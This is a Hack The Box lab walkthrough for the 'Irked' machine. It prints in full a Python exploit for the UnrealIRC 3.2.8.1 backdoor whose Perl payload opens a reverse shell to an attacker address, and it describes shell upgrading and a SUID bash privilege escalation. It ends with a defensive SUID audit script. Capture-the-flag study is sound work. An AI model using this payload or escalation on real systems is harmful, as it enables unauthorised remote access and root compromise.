Hack The Box – Irked Walkthrough

Introduction

This was an easy Linux box that involved exploiting a vulnerability that allowed files to be downloaded and executed remotely to gain initial access, using steganography to escalate to the djmardov user, and exploiting a custom SUID binary to gain root access.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

When running a scan using the -p- flag to scan all ports, port 8067 is found:

Enumerating Port HTTP

The webserver's home page shows the below; after running a few scans to find hidden files and directories, nothing useful was found:

Enumerating IRC

IRC is an application-layer protocol used to build chat clients and servers. This box uses UnrealIRC for this service. When searching for public exploits with SearchSploit, a few come up:

The above did not seem to work, so after some research, the following GitHub repository was found to have a working script for this vulnerability:

Exploiting UnrealIRC 3.2.8.1

After cloning the repository, the local and remote IP addresses and ports are updated in the script:

# Python 2 script: the bare "print" statement further down is Python 2 syntax
import socket

#target ip and port
ip="10.10.10.117"
port=8067
##################
print ("MADE BY :- SARTHAK")
print("			Referenced by:- Metasploit source code")

print("NOTE:-I MADE THIS DUE TO PEOPLE PREPARING FOR OSCP WANT TO DO EXPLOITATION MANUALLY AS WELL AS THE EXPLOIT-DB EXPLOIT DOESN'T SEEM TO BE WORKING IDK WHY :(\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((ip,port))

a=s.recv(1024)

print "Sending payload baby :)"

#replace the ip and port with yours ...(YOUR IP AND PORT)
a="AB;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"10.10.14.8:443\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"

s.sendall(a)
print("Eyes on netcat sire 10...9...8...7...6...5..4..3...2..1..HAHA IT WILL COME :)")

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

After running the script, a callback granting a reverse shell is received:

The following steps can be done to obtain an interactive shell:

  • Running python -c 'import pty; pty.spawn("/bin/sh")' on the victim host
  • Hitting CTRL+Z to background the process and return to our host
  • Running stty raw -echo on our host
  • Running fg and hitting ENTER to return to the reverse shell

Privilege Escalation

When inspecting the irc user's bash history, the Documents folder in the djmardov user's home directory is mentioned.

When navigating to the Documents folder, a file in a hidden folder is found containing what seems to be a password for use with steganography:

Downloading the image used in the home page of the web server:

Steghide is a steganography program that can hide data in image files. Using steghide to extract information from the image with the password found:

A pass.txt file was extracted. Using the password in it to log in through SSH:

Listing SUID/SGID binaries with the following (the second find needs the -o alternatives grouped so that -type f and the stderr redirect apply to all of them):

find / -perm -u=s -type f 2>/dev/null; find / -type f \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null

When running the /usr/bin/viewuser binary, it looks like it is trying to execute a listuser file, which it cannot find:

Creating a listuser script that prints the user name and id to verify that it is executed:

Executing viewuser again: based on the output below, the listuser script is executed as root.

Modifying the script to create a SUID copy of bash:

Executing the script and verifying that the binary has been created, is owned by root and has the SUID bit set:

After executing the new SUID bash binary with the -p flag, which tells bash not to drop the effective UID to the real UID at startup, root access to the host is obtained:
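From the defender's side, the SUID copy of bash created above is exactly the kind of file a periodic audit should catch. The following is an added example, not part of the original walkthrough: it reproduces the find -perm enumeration with os.lstat and flags SUID/SGID files that are missing from a baseline allowlist or sit in a world-writable directory. The baseline paths and the demo tree are constructed for illustration.

```python
import os
import stat
import tempfile

# Constructed allowlist of SUID/SGID paths expected on the box; on a real host
# it is recorded from a known-good state and compared against on every scan.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/viewuser"}

def scan_setuid(root):
    """Return {path: mode} for regular files under root with SUID or SGID set,
    the same selection as the find -perm -4000 / -perm -2000 command above."""
    found = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable entries are skipped, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found[path] = st.st_mode
    return found

def unexpected_setuid(found, baseline=BASELINE):
    """Map each SUID/SGID path to the reasons it deserves a closer look."""
    flagged = {}
    for path in sorted(found):
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if os.lstat(os.path.dirname(path)).st_mode & stat.S_IWOTH:
            reasons.append("parent directory is world-writable")
        if reasons:
            flagged[path] = reasons
    return flagged

def demo():
    """Constructed tree: one expected SUID file, one unexpected SUID copy named
    bash (as created in the escalation above) and one plain executable."""
    root = tempfile.mkdtemp()
    paths = {}
    for name, mode in (("passwd", 0o4755), ("bash", 0o4755), ("plain", 0o755)):
        paths[name] = os.path.join(root, name)
        open(paths[name], "w").close()
        os.chmod(paths[name], mode)
    found = scan_setuid(root)
    return paths, found, unexpected_setuid(found, baseline={paths["passwd"]})
```

Running scan_setuid("/") on the box and diffing against a stored baseline after each login would surface the new bash copy even though its owner is root.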

Conclusion

This was a very interesting box: even though the SUID privilege escalation part was pretty ordinary, IRC isn't a service that is seen very often these days, and the steganography aspect was really unique.